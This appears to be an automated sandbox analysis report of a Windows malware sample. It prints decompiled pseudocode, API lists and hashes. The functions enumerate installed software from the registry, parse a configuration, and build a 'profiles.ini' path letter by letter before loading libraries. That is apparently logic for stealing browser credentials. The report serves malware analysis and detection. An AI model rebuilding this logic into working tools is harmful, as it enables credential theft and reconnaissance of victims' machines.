					if(_t350 != 0xffffffff) {
						E00404C57(_t355 - 0x418, _t283, 9);
						_t327 =  *((intOrPtr*)(_t355 - 0x418));
						if( *((intOrPtr*)(_t355 - 0x404)) < 0x10) {
							_t327 = _t355 - 0x418;
						}
						_t259 =  *((intOrPtr*)(_t355 - 0x408));
						_t340 =  *((intOrPtr*)(_t355 - 0x408)) + _t327;
						_t328 =  *((intOrPtr*)(_t355 - 0x418));
						if( *((intOrPtr*)(_t355 - 0x404)) < 0x10) {
							_t328 = _t355 - 0x418;
						}
						E004153D4(_t355 - 0x418, _t355 - 0x4e8, _t259 + _t328 + 0xfffffff9, _t340);
						E00404B1F(_t355 - 0x450, _t355 - 0x418, 0, 0xffffffff);
						_t283 = 0;
					}
					_t200 =  *0x446f9c; // 0x6e8af8
					_t347 = _t200;
					_t201 = E004201E0(_t200);
					_t307 = _t355 - 0x418;
					_t85 = _t350 + 1; // 0x1
					_t203 = E0040CD72(_t85, _t355 - 0x418, _t200, _t201);
					 *((intOrPtr*)(_t355 - 0x4e0)) = _t203;
					if(_t203 != 0xffffffff) {
						E00404C57(_t355 - 0x418, _t283, 0x1b);
						_t324 =  *((intOrPtr*)(_t355 - 0x418));
						if( *((intOrPtr*)(_t355 - 0x404)) < 0x10) {
							_t324 = _t355 - 0x418;
						}
						_t247 =  *((intOrPtr*)(_t355 - 0x408));
						_t341 =  *((intOrPtr*)(_t355 - 0x408)) + _t324;
						_t325 =  *((intOrPtr*)(_t355 - 0x418));
						if( *((intOrPtr*)(_t355 - 0x404)) < 0x10) {
							_t325 = _t355 - 0x418;
						}
						E004153D4(_t355 - 0x418, _t355 - 0x4f8, _t247 + _t325 + 0xfffffff9, _t341);
						_t358 = _t358 - 0x1c;
						 *((intOrPtr*)(_t355 - 0x4ec)) = _t358;
						E00404E93(_t358, _t355 - 0x418);
						_push(_t355 - 0x4dc);
						_t350 = E0041792D(_t355 - 0x4f8, _t347, _t358, _t247 + _t325 + 0xfffffff9);
						_t347 = _t355 - 0x434;
						 *(_t355 - 4) = 6;
						E00404A22(_t355 - 0x434, _t255);
						_t307 = _t355 - 0x4dc;
						 *(_t355 - 4) = 5;
						E00404A66(_t355 - 0x4dc, 1, 0);
					}
					_t284 = _t355 - 0x488;
					if(E004166B3(_t355 - 0x488) != 0) {
						_t284 = _t355 - 0x46c;
						if(E004166B3(_t355 - 0x46c) != 0) {
							_t284 = _t355 - 0x450;
							if(E004166B3(_t355 - 0x450) != 0) {
								_t284 = _t355 - 0x434;
								_t220 = E004166B3(_t355 - 0x434);
								_t382 = _t220;
								if(_t220 != 0) {
									_t350 =  *((intOrPtr*)(_t355 - 0x4e4));
									 *0x4474e0(_t350,  *0x4471e8);
									 *0x4474e0(_t350,  *0x4471a0);
									_push(":");
									_push(_t355 - 0x4a4);
									_t224 = E0040CEE5(_t284, _t355 - 0x488, _t350, _t382);
									 *(_t355 - 4) = 7;
									_t225 = E0040E6BA(_t224, _t224, _t355 - 0x4c0, _t355 - 0x46c);
									_t358 = _t358 + 0x10;
									 *(_t355 - 4) = 8;
									if( *((intOrPtr*)(_t225 + 0x14)) >= 0x10) {
										_t225 =  *_t225;
									}
									 *0x4474e0(_t350, _t225);
									E00404A66(_t355 - 0x4c0, 1, 0);
									 *(_t355 - 4) = 5;
									E00404A66(_t355 - 0x4a4, 1, 0);
									_t349 = "\n";
									 *0x4474e0(_t350, _t349);
									 *0x4474e0(_t350,  *0x446c5c);
									_t231 =  *((intOrPtr*)(_t355 - 0x450));
									if( *((intOrPtr*)(_t355 - 0x43c)) < 0x10) {
										_t231 = _t355 - 0x450;
									}
									 *0x4474e0(_t350, _t231);
									 *0x4474e0(_t350, _t349);
									 *0x4474e0(_t350,  *0x44715c);
									_t385 =  *((intOrPtr*)(_t355 - 0x420)) - 0x10;
									_t235 =  *((intOrPtr*)(_t355 - 0x434));
									if( *((intOrPtr*)(_t355 - 0x420)) < 0x10) {
										_t235 = _t355 - 0x434;
									}
									 *0x4474e0(_t350, _t235);
									 *0x4474e0(_t350, "\n\n");
									_t347 = 0x43d12c;
									E00404AAA(_t355 - 0x488, _t385, 0x43d12c, E004201E0(0x43d12c));
									E00404AAA(_t355 - 0x46c, _t385, 0x43d12c, E004201E0(0x43d12c));
									E00404AAA(_t355 - 0x450, _t385, 0x43d12c, E004201E0(0x43d12c));
									_t244 = E004201E0(0x43d12c);
									_t307 = _t355 - 0x434;
									E00404AAA(_t355 - 0x434, _t385, 0x43d12c, _t244);
									 *0x4472ec =  *0x4472ec + 1;
									_t386 =  *0x4472ec;
								}
							}
						}
					}
					_push(0xa);
					_push(_t355 +  *((intOrPtr*)( *((intOrPtr*)(_t355 - 0x5ac)) + 4)) - 0x5ac);
					_push(E00416460(_t284, _t307, _t347, _t350, _t386) & 0x000000ff);
					_push(_t355 - 0x418);
					_push(_t355 - 0x5ac);
					_t212 = E0041686A(_t284, _t307, _t347, _t350, _t386);
					_t358 = _t358 + 0xc;
					asm("sbb eax, eax");
					_t283 = 0;
					if(( *((intOrPtr*)( *_t212 + 4)) + _t212 &  !( ~( *( *((intOrPtr*)( *_t212 + 4)) + _t212 + 0xc) & 0x00000006))) != 0) {
						_t343 =  *((intOrPtr*)(_t355 - 0x4e0));
						goto L5;
					}
					goto L41;
				}
			}

0x00411ad2
0x00411ad2
0x00411adc
0x00411ae9
0x00411aef
0x00411af9
0x00411afe
0x00411b03
0x00411b08
0x00411b11
0x00411b24
0x00411b31
0x00411b3a
0x0041210b
0x00412110
0x00412110
0x00411b40
0x00411b42
0x00000000
0x00000000
0x00411b4e
0x00411b55
0x00411b56
0x00411b5d
0x00411b60
0x00411b61
0x00411b67
0x00411b6d
0x00411b73
0x00411b75
0x00411b7b
0x00411b81
0x00411b87
0x00411b8d
0x00411b93
0x00411b99
0x00411b9f
0x00411ba5
0x00411bab
0x00411bb1
0x00411bb7
0x00411bbd
0x00411bca
0x00411bd3
0x00411bdc
0x00411be3
0x00411bea
0x00411beb
0x00411bff
0x00411c04
0x00411c0a
0x004120a1
0x004120a4
0x004120ac
0x004120b9
0x004120c6
0x004120d3
0x004120e0
0x004120e5
0x004120ef
0x004120fb
0x00412105
0x00000000
0x00411c10
0x00411c18
0x00411c18
0x00411c20
0x00411c2e
0x00411c37
0x00411c3c
0x00411c47
0x00411c53
0x00411c59
0x00411c5b
0x00411c5b
0x00411c68
0x00411c6e
0x00411c71
0x00411c77
0x00411c79
0x00411c79
0x00411c92
0x00411ca8
0x00411cad
0x00411cad
0x00411caf
0x00411cb7
0x00411cc5
0x00411cce
0x00411cd3
0x00411cde
0x00411cea
0x00411cf0
0x00411cf2
0x00411cf2
0x00411cff
0x00411d05
0x00411d08
0x00411d0e
0x00411d10
0x00411d10
0x00411d29
0x00411d3f
0x00411d44
0x00411d44
0x00411d46
0x00411d4e
0x00411d5c
0x00411d65
0x00411d6a
0x00411d75
0x00411d81
0x00411d87
0x00411d89
0x00411d89
0x00411d96
0x00411d9c
0x00411d9f
0x00411da5
0x00411da7
0x00411da7
0x00411dc0
0x00411dd6
0x00411ddb
0x00411ddb
0x00411ddd
0x00411de3
0x00411de5
0x00411ded
0x00411df3
0x00411df7
0x00411dfc
0x00411e05
0x00411e14
0x00411e20
0x00411e26
0x00411e28
0x00411e28
0x00411e35
0x00411e3b
0x00411e3e
0x00411e44
0x00411e46
0x00411e46
0x00411e5f
0x00411e64
0x00411e6f
0x00411e76
0x00411e81
0x00411e87
0x00411e89
0x00411e8f
0x00411e93
0x00411e9c
0x00411ea2
0x00411ea6
0x00411ea6
0x00411eab
0x00411eb8
0x00411ebe
0x00411ecb
0x00411ed1
0x00411ede
0x00411ee4
0x00411eea
0x00411eef
0x00411ef1
0x00411efd
0x00411f04
0x00411f11
0x00411f1d
0x00411f22
0x00411f29
0x00411f3e
0x00411f42
0x00411f47
0x00411f4a
0x00411f52
0x00411f54
0x00411f54
0x00411f58
0x00411f68
0x00411f77
0x00411f7b
0x00411f80
0x00411f87
0x00411f94
0x00411fa1
0x00411fa7
0x00411fa9
0x00411fa9
0x00411fb1
0x00411fb9
0x00411fc6
0x00411fcc
0x00411fd3
0x00411fd9
0x00411fdb
0x00411fdb
0x00411fe3
0x00411fef
0x00411ff5
0x00412009
0x0041201d
0x00412031
0x00412037
0x0041203f
0x00412045
0x0041204a
0x0041204a
0x0041204a
0x00411ef1
0x00411ede
0x00411ecb
0x00412059
0x00412062
0x0041206b
0x00412072
0x00412079
0x0041207a
0x0041208e
0x00412093
0x00412097
0x0041209b
0x00411c12
0x00000000
0x00411c12
0x00000000
0x0041209b

APIs

__EH_prolog3_GS.LIBCMT ref: 00411ADC
_memset.LIBCMT ref: 00411AF9

Part of subcall function 004181BE: _memset.LIBCMT ref: 004181DF
Part of subcall function 004181BE: SHGetFolderPathA.SHELL32(00000000,00408F7C,00000000,00000000,?), ref: 004181F7

lstrcat.KERNEL32(?,00000000), ref: 00411B11
lstrcat.KERNEL32(?), ref: 00411B24
GetFileAttributesA.KERNELBASE(?,?,00000000), ref: 00411B31

Part of subcall function 004157AF: __EH_prolog3.LIBCMT ref: 004157B6

Part of subcall function 00416460: __EH_prolog3.LIBCMT ref: 00416467

Part of subcall function 0041686A: __EH_prolog3_catch.LIBCMT ref: 00416871

_strlen.LIBCMT ref: 00411C20
_strlen.LIBCMT ref: 00411CB7
_strlen.LIBCMT ref: 00411D4E
_strlen.LIBCMT ref: 00411DE5

Part of subcall function 00404C57: std::_Xinvalid_argument.LIBCPMT ref: 00404C6D
Part of subcall function 00404C57: _memmove.LIBCMT ref: 00404CA6

lstrcat.KERNEL32(?,00000001), ref: 00411F04
lstrcat.KERNEL32(?), ref: 00411F11
lstrcat.KERNEL32(?,0043D130), ref: 00411F87
lstrcat.KERNEL32(?), ref: 00411F94
lstrcat.KERNEL32(?,?), ref: 00411FB1
lstrcat.KERNEL32(?,0043D130), ref: 00411FB9
lstrcat.KERNEL32(?), ref: 00411FC6
lstrcat.KERNEL32(?,?), ref: 00411FE3
lstrcat.KERNEL32(?,0043F4D8), ref: 00411FEF
_strlen.LIBCMT ref: 00411FFB
_strlen.LIBCMT ref: 0041200F
_strlen.LIBCMT ref: 00412023
_strlen.LIBCMT ref: 00412037
lstrcat.KERNEL32(?,00000000), ref: 00411F58

Part of subcall function 00404A66: _memmove.LIBCMT ref: 00404A86

std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00412105

Memory Dump Source

Source File: 00000002.00000002.244915415.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.245003002.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$_strlen$H_prolog3_memmove_memset$AttributesFileFolderH_prolog3_H_prolog3_catchIos_base_dtorPathXinvalid_argumentstd::_std::ios_base::_
String ID:
API String ID: 1852721633-0
Opcode ID: b584c1ed3f762bfb394a8acd4032dfb3394d9113425681bbaee31b5f1e3795c6
Instruction ID: 7c321bee6925f233182f6db30a195c795b545ae975442de285582f35615d1254
Opcode Fuzzy Hash: b584c1ed3f762bfb394a8acd4032dfb3394d9113425681bbaee31b5f1e3795c6
Instruction Fuzzy Hash: EA025DB19001289FDB60DB64CD81AEE7778AB45304F4045EEE609A7192EB346FC9CF6C

Uniqueness

Uniqueness Score: -1.00%

Function 0040A7FB Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 171
stringCOMMON

Download Yara Rule

C-Code - Quality: 51%

			E0040A7FB(void* __edx, void* __eflags) {
				signed int _v8;
				char _v5012;
				char _v55012;
				char _v60012;
				char _v110012;
				char _v125012;
				intOrPtr _v125016;
				intOrPtr _v125020;
				char _v125024;
				intOrPtr _v125028;
				intOrPtr _v125032;
				char _v125036;
				intOrPtr _v125040;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t53;
				intOrPtr _t55;
				intOrPtr _t56;
				intOrPtr _t71;
				intOrPtr _t73;
				char* _t76;
				intOrPtr _t79;
				intOrPtr _t82;
				intOrPtr _t85;
				intOrPtr _t87;
				intOrPtr _t88;
				intOrPtr _t89;
				void* _t108;
				signed int _t111;
				void* _t112;
				void* _t117;

				_t108 = __edx;
				E0042E350(0x1e86c);
				_t53 =  *0x444664; // 0xfa3a0753
				_v8 = _t53 ^ _t111;
				_t55 =  *0x4472ac; // 0x0
				_v125040 = _t55;
				_t56 =  *0x447298; // 0x1acb8020
				_v125020 = _t56;
				_v125028 = 0;
				E0041F6B0( &_v110012, 0, 0xc350);
				E0041F6B0( &_v60012, 0, 0x1388);
				E0041F6B0( &_v5012, 0, 0x1388);
				E0041F6B0( &_v55012, 0, 0xc350);
				E0041F6B0( &_v125012, 0, 0x3a98);
				_t117 = _t112 + 0x3c;
				 *0x4474e0( &_v110012, _v125020);
				_t71 = E00421D3B(0, _t108, 0xc350,  &_v110012, ";",  &_v125036);
				_v125024 = 1;
				while(1) {
					_t117 = _t117 + 0xc;
					_v125016 = _t71;
					if(_t71 == 0) {
						break;
					}
					_t73 = _v125024 - 1;
					__eflags = _t73;
					if(_t73 == 0) {
						E0041F6B0( &_v60012, 0, 0x1388);
						_t76 =  &_v60012;
						L17:
						_t117 = _t117 + 0xc;
						 *0x4474e0(_t76, _v125016);
						L18:
						_t45 =  &_v125024;
						 *_t45 = _v125024 + 1;
						__eflags =  *_t45;
						_t71 = E00421D3B(0, _t108, 0xc350, 0, ";",  &_v125036);
						continue;
					}
					_t79 = _t73 - 1;
					__eflags = _t79;
					if(_t79 == 0) {
						E0041F6B0( &_v5012, 0, 0x1388);
						_t76 =  &_v5012;
						goto L17;
					}
					_t82 = _t79 - 1;
					__eflags = _t82;
					if(_t82 == 0) {
						E0041F6B0( &_v55012, 0, 0xc350);
						_t76 =  &_v55012;
						goto L17;
					} else {
						_t85 = _t82 - 1;
						__eflags = _t85;
						if(_t85 == 0) {
							_push(_v125016);
							_v125032 = E00421EE3();
						} else {
							_t87 = _t85 - 1;
							__eflags = _t87;
							if(_t87 == 0) {
								_t88 =  *0x447510(_v125016, "true");
								__eflags = _t88;
								if(_t88 != 0) {
									_t89 =  *0x447510(_v125016, "false");
									__eflags = _t89;
									if(_t89 != 0) {
										_push(_v125016);
										_v125020 = 1;
										_v125028 = E00421EE3();
									} else {
										_v125020 = 0;
									}
								} else {
									_v125020 = 1;
									_v125028 = 0x3e7;
								}
							} else {
								__eflags = _t87 == 1;
								if(_t87 == 1) {
									E0041F6B0( &_v125012, 0, 0x3a98);
									 *0x4474e0( &_v125012, _v125016);
									_push(_v125028);
									_push(_v125040);
									_push(_v125016);
									_push(_v125020);
									_push( &_v55012);
									_push( &_v5012);
									_push(_v125032);
									E0040A392(0,  &_v60012, _t108, 0xc350, 0x1388, __eflags); // executed
									_t117 = _t117 + 0x28;
									_v125024 = 0;
								}
							}
						}
						goto L18;
					}
				}
				return E0041F69E(E0041F6B0( &_v110012, 0, 0xc350), 0, _v8 ^ _t111, _t108, 0xc350, 0x1388);
			}

0x0040a7fb
0x0040a803
0x0040a808
0x0040a80f
0x0040a812
0x0040a81a
0x0040a820
0x0040a82d
0x0040a83b
0x0040a841
0x0040a857
0x0040a868
0x0040a879
0x0040a88e
0x0040a893
0x0040a8a3
0x0040a8bc
0x0040a8c1
0x0040aa51
0x0040aa51
0x0040aa54
0x0040aa5c
0x00000000
0x00000000
0x0040a8d6
0x0040a8d6
0x0040a8d7
0x0040aa1e
0x0040aa23
0x0040aa29
0x0040aa29
0x0040aa33
0x0040aa39
0x0040aa39
0x0040aa39
0x0040aa39
0x0040aa4c
0x00000000
0x0040aa4c
0x0040a8dd
0x0040a8dd
0x0040a8de
0x0040aa08
0x0040aa0d
0x00000000
0x0040aa0d
0x0040a8e4
0x0040a8e4
0x0040a8e5
0x0040a9f2
0x0040a9f7
0x00000000
0x0040a8eb
0x0040a8eb
0x0040a8eb
0x0040a8ec
0x0040a9d5
0x0040a9e1
0x0040a8f2
0x0040a8f2
0x0040a8f2
0x0040a8f3
0x0040a974
0x0040a97a
0x0040a97c
0x0040a9a2
0x0040a9a8
0x0040a9aa
0x0040a9b7
0x0040a9bd
0x0040a9cd
0x0040a9ac
0x0040a9ac
0x0040a9ac
0x0040a97e
0x0040a97e
0x0040a988
0x0040a988
0x0040a8f5
0x0040a8f5
0x0040a8f6
0x0040a909
0x0040a91e
0x0040a924
0x0040a930
0x0040a93c
0x0040a942
0x0040a948
0x0040a94f
0x0040a950
0x0040a956
0x0040a95b
0x0040a95e
0x0040a95e
0x0040a8f6
0x0040a8f3
0x00000000
0x0040a8ec
0x0040a8e5
0x0040aa81

APIs

_memset.LIBCMT ref: 0040A841
_memset.LIBCMT ref: 0040A857
_memset.LIBCMT ref: 0040A868
_memset.LIBCMT ref: 0040A879
_memset.LIBCMT ref: 0040A88E
lstrcat.KERNEL32(?,?), ref: 0040A8A3
_strtok_s.LIBCMT ref: 0040A8BC
_memset.LIBCMT ref: 0040A909
lstrcat.KERNEL32(?,?), ref: 0040A91E
_strtok_s.LIBCMT ref: 0040AA4C
_memset.LIBCMT ref: 0040AA6B

Strings

false, xrefs: 0040A997
true, xrefs: 0040A969

Memory Dump Source

Source File: 00000002.00000002.244915415.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.245003002.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Yara matches

Similarity

API ID: _memset$_strtok_slstrcat
String ID: false$true
API String ID: 3121452665-2658103896
Opcode ID: 61f53c9cab9de0ca3da4bfcee5f2b898348dfc0e56c6152a0124bd187e5adb45
Instruction ID: b834e5836c69e65c3720ff06e78ea6fbf4cc21c3fc7a11af26a1b96be58296cc
Opcode Fuzzy Hash: 61f53c9cab9de0ca3da4bfcee5f2b898348dfc0e56c6152a0124bd187e5adb45
Instruction Fuzzy Hash: 4B5133B2E0025CAADB209F95DC45CDEB7BCEF15348F0404FAB80DA2151DA395B95CF59

Uniqueness

Uniqueness Score: -1.00%

Function 00416DD7 Relevance: 33.4, APIs: 14, Strings: 5, Instructions: 122
registrystringCOMMON

Download Yara Rule

C-Code - Quality: 55%

			E00416DD7(intOrPtr _a4) {
				signed int _v8;
				char _v1032;
				char _v2056;
				char _v3080;
				int _v3084;
				void* _v3088;
				intOrPtr _v3092;
				void* _v3096;
				int* _v3100;
				int _v3104;
				long _v3108;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t44;
				long _t48;
				long _t52;
				long _t58;
				long _t63;
				long _t70;
				char* _t76;
				void* _t79;
				signed int _t82;
				void* _t83;

				_t44 =  *0x444664; // 0xfa3a0753
				_v8 = _t44 ^ _t82;
				_v3092 = _a4;
				_t76 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall";
				_v3096 = 0;
				_v3088 = 0;
				_v3104 = 0xf003f;
				_v3084 = 0;
				_t48 = RegOpenKeyExA(0x80000002, _t76, 0, 0x20019,  &_v3096); // executed
				if(_t48 == 0) {
					_v3100 = 0;
					do {
						_v3084 = 0x400;
						_t52 = RegEnumKeyExA(_v3096, _v3100,  &_v2056,  &_v3084, 0, 0, 0, 0); // executed
						_v3108 = _t52;
						if(_t52 != 0) {
							goto L9;
						} else {
							wsprintfA( &_v3080, "%s\\%s", _t76,  &_v2056);
							_t83 = _t83 + 0x10;
							_t58 = RegOpenKeyExA(0x80000002,  &_v3080, 0, 0x20019,  &_v3088); // executed
							if(_t58 != 0) {
								RegCloseKey(_v3088);
							} else {
								_v3084 = 0x400;
								_t63 = RegQueryValueExA(_v3088, "DisplayName", 0,  &_v3104,  &_v1032,  &_v3084); // executed
								if(_t63 == 0) {
									 *0x4474e0(_v3092,  &_v1032);
									_v3084 = 0x400;
									_t70 = RegQueryValueExA(_v3088, "DisplayVersion", 0,  &_v3104,  &_v1032,  &_v3084); // executed
									if(_t70 == 0) {
										 *0x4474e0(_v3092, " [");
										 *0x4474e0(_v3092,  &_v1032);
										 *0x4474e0(_v3092, "]");
									}
									 *0x4474e0(_v3092, "\n");
								}
								RegCloseKey(_v3088);
								goto L9;
							}
						}
						L12:
						_t48 = RegCloseKey(_v3096);
						goto L13;
						L9:
						_v3100 = _v3100 + 1;
					} while (_v3108 == 0);
					goto L12;
				}
				L13:
				return E0041F69E(_t48, _t76, _v8 ^ _t82, _t79, 0x80000002, 0);
			}

0x00416de0
0x00416de7
0x00416df0
0x00416e05
0x00416e11
0x00416e17
0x00416e1d
0x00416e27
0x00416e2d
0x00416e35
0x00416e3b
0x00416e41
0x00416e59
0x00416e69
0x00416e6f
0x00416e77
0x00000000
0x00416e7d
0x00416e91
0x00416e97
0x00416eaf
0x00416eb7
0x00416faa
0x00416ebd
0x00416ede
0x00416ee8
0x00416ef0
0x00416f03
0x00416f2a
0x00416f34
0x00416f3c
0x00416f49
0x00416f5c
0x00416f6d
0x00416f6d
0x00416f7e
0x00416f7e
0x00416f8a
0x00000000
0x00416f8a
0x00416eb7
0x00416fb0
0x00416fb6
0x00000000
0x00416f90
0x00416f90
0x00416f96
0x00000000
0x00416fa2
0x00416fbc
0x00416fca

APIs

RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?,0043D130,?,00000000), ref: 00416E2D
RegEnumKeyExA.KERNEL32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 00416E69
wsprintfA.USER32 ref: 00416E91
RegOpenKeyExA.KERNEL32(80000002,?,00000000,00020019,?), ref: 00416EAF
RegQueryValueExA.KERNEL32(?,DisplayName,00000000,?,?,00000400), ref: 00416EE8
lstrcat.KERNEL32(?,?), ref: 00416F03
RegQueryValueExA.KERNEL32(?,DisplayVersion,00000000,?,?,00000400), ref: 00416F34
lstrcat.KERNEL32(?,0043F4DC), ref: 00416F49
lstrcat.KERNEL32(?,?), ref: 00416F5C
lstrcat.KERNEL32(?,0043FF0C), ref: 00416F6D
lstrcat.KERNEL32(?,0043D130), ref: 00416F7E
RegCloseKey.ADVAPI32(?), ref: 00416F8A
RegCloseKey.ADVAPI32(?), ref: 00416FAA
RegCloseKey.ADVAPI32(?), ref: 00416FB6

Strings

DisplayName, xrefs: 00416ED3
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 00416E05, 00416E0A, 00416E84
DisplayVersion, xrefs: 00416F1F
%s\%s, xrefs: 00416E8B
?, xrefs: 00416E1D

Memory Dump Source

Source File: 00000002.00000002.244915415.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.245003002.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$Close$OpenQueryValue$Enumwsprintf
String ID: %s\%s$?$DisplayName$DisplayVersion$SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
API String ID: 3722822016-3437733507
Opcode ID: f31ce02b464911a620e8da07adfd22ff8d6eae589b6226aae0ce74b31140d364
Instruction ID: c4c635ccb428081dbd0d3c14d3f8058dee856206d8e3bc6385e0301d448fcfde
Opcode Fuzzy Hash: f31ce02b464911a620e8da07adfd22ff8d6eae589b6226aae0ce74b31140d364
Instruction Fuzzy Hash: 33511EB590412CABEB219F54DD44EEABB7CFB05704F1042E6B609E2122DF345AC5CF58

Uniqueness

Uniqueness Score: -1.00%

Function 00414903 Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 107
stringCOMMON

Download Yara Rule

C-Code - Quality: 22%

			E00414903(void* __ebx, void* __edx, void* __edi, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				char _v276;
				char _v540;
				intOrPtr _v544;
				intOrPtr _v548;
				void* __esi;
				void* __ebp;
				signed int _t30;
				void* _t38;
				int _t67;
				void* _t78;
				signed int _t81;

				_t79 = __edi;
				_t78 = __edx;
				_t73 = __ebx;
				_t30 =  *0x444664; // 0xfa3a0753
				_v8 = _t30 ^ _t81;
				_v544 = _a4;
				_v548 = _a8;
				E0041F6B0( &_v540, 0, 0x104);
				E0041F6B0( &_v276, 0, 0x104);
				_t38 = E004181BE(__ebx, __edi, 0x104, 0x1a); // executed
				 *0x4474e0( &_v540, _t38);
				 *0x4474e0( &_v540, __ebx);
				 *0x4474e0( &_v276,  &_v540);
				 *0x4474e0( &_v276, "..\\");
				 *0x4474e0( &_v276, "p");
				 *0x4474e0( &_v276, "r");
				 *0x4474e0( &_v276, "o");
				 *0x4474e0( &_v276, "f");
				 *0x4474e0( &_v276, "i");
				 *0x4474e0( &_v276, "l");
				 *0x4474e0( &_v276, "e");
				 *0x4474e0( &_v276, "s");
				 *0x4474e0( &_v276, ".ini");
				_t67 = GetFileAttributesA( &_v276); // executed
				if(_t67 != 0xffffffff) {
					_t87 = _t67 & 0x00000010;
					if((_t67 & 0x00000010) == 0) {
						E0040C251(__ebx, _t78, __edi, 0x104, _t87);
						if(E0041476C(__ebx, _t78, __edi, 0x104) != 0) {
							E004118D3(__edi, _t78, 0x43d12c,  &_v540, _v544,  *((intOrPtr*)(__edi + 0x20)), _v548);
						}
						_t67 = FreeLibrary( *0x4472fc);
					}
				}
				return E0041F69E(_t67, _t73, _v8 ^ _t81, _t78, _t79, 0x104);
			}

0x00414903
0x00414903
0x00414903
0x0041490c
0x00414913
0x0041491a
0x00414929
0x00414938
0x0041494a
0x00414954
0x00414962
0x00414970
0x00414984
0x00414996
0x004149a8
0x004149ba
0x004149cc
0x004149de
0x004149f0
0x00414a02
0x00414a14
0x00414a26
0x00414a38
0x00414a45
0x00414a4e
0x00414a50
0x00414a52
0x00414a54
0x00414a60
0x00414a7f
0x00414a7f
0x00414a8a
0x00414a8a
0x00414a52
0x00414a9c

APIs

_memset.LIBCMT ref: 00414938
_memset.LIBCMT ref: 0041494A

Part of subcall function 004181BE: _memset.LIBCMT ref: 004181DF
Part of subcall function 004181BE: SHGetFolderPathA.SHELL32(00000000,00408F7C,00000000,00000000,?), ref: 004181F7

lstrcat.KERNEL32(?,00000000), ref: 00414962
lstrcat.KERNEL32(?,006E8650), ref: 00414970
lstrcat.KERNEL32(?,?), ref: 00414984
lstrcat.KERNEL32(?,..\), ref: 00414996
lstrcat.KERNEL32(?,0043FC98), ref: 004149A8
lstrcat.KERNEL32(?,0043FC9C), ref: 004149BA
lstrcat.KERNEL32(?,0043FCA0), ref: 004149CC
lstrcat.KERNEL32(?,0043FCA4), ref: 004149DE
lstrcat.KERNEL32(?,0043FCA8), ref: 004149F0
lstrcat.KERNEL32(?,0043F564), ref: 00414A02
lstrcat.KERNEL32(?,0043F568), ref: 00414A14
lstrcat.KERNEL32(?,0043F570), ref: 00414A26
lstrcat.KERNEL32(?,.ini), ref: 00414A38
GetFileAttributesA.KERNEL32(?,?,?,?,?,?,?), ref: 00414A45

Part of subcall function 0040C251: __EH_prolog3_GS.LIBCMT ref: 0040C258

Part of subcall function 0041476C: GetEnvironmentVariableA.KERNEL32(PATH,00447FF0,0000FFFF,?,00000104,006E8650,?,00414A5E,?,?,?,?,?,?), ref: 004147AA
Part of subcall function 0041476C: _memset.LIBCMT ref: 004147BF
Part of subcall function 0041476C: lstrcat.KERNEL32(?,00447FF0), ref: 004147CF
Part of subcall function 0041476C: lstrcat.KERNEL32(?,0043F328), ref: 004147E1
Part of subcall function 0041476C: lstrcat.KERNEL32(?,?), ref: 004147F4
Part of subcall function 0041476C: SetEnvironmentVariableA.KERNEL32(PATH,?,?,?,00414A5E,?,?,?,?,?,?), ref: 00414802
Part of subcall function 0041476C: _memset.LIBCMT ref: 00414813
Part of subcall function 0041476C: LoadLibraryA.KERNEL32(?,?,?,?,?,00414A5E,?,?,?,?,?,?), ref: 00414821
Part of subcall function 0041476C: GetProcAddress.KERNEL32(00000000), ref: 0041483B
Part of subcall function 0041476C: GetProcAddress.KERNEL32 ref: 00414852
Part of subcall function 0041476C: GetProcAddress.KERNEL32 ref: 00414869
Part of subcall function 0041476C: GetProcAddress.KERNEL32 ref: 00414880
Part of subcall function 0041476C: GetProcAddress.KERNEL32 ref: 00414897
Part of subcall function 0041476C: GetProcAddress.KERNEL32 ref: 004148AE

FreeLibrary.KERNEL32(?,?,?,?,?,?), ref: 00414A8A

Part of subcall function 004118D3: wsprintfA.USER32 ref: 0041191D
Part of subcall function 004118D3: FindFirstFileA.KERNEL32(?,?), ref: 00411934
Part of subcall function 004118D3: StrCmpCA.SHLWAPI(?,0043F354), ref: 00411955
Part of subcall function 004118D3: StrCmpCA.SHLWAPI(?,0043F358), ref: 0041196F
Part of subcall function 004118D3: wsprintfA.USER32 ref: 00411996
Part of subcall function 004118D3: StrCmpCA.SHLWAPI(?), ref: 004119AC
Part of subcall function 004118D3: FindNextFileA.KERNEL32(?,?), ref: 00411AA7
Part of subcall function 004118D3: FindClose.KERNEL32(?), ref: 00411ABB

Strings

..\, xrefs: 0041498A
.ini, xrefs: 00414A2C

Memory Dump Source

Source File: 00000002.00000002.244915415.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.245003002.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$AddressProc$_memset$FileFind$EnvironmentLibraryVariablewsprintf$AttributesCloseFirstFolderFreeH_prolog3_LoadNextPath
String ID: ..\$.ini
API String ID: 2707205512-2443844595
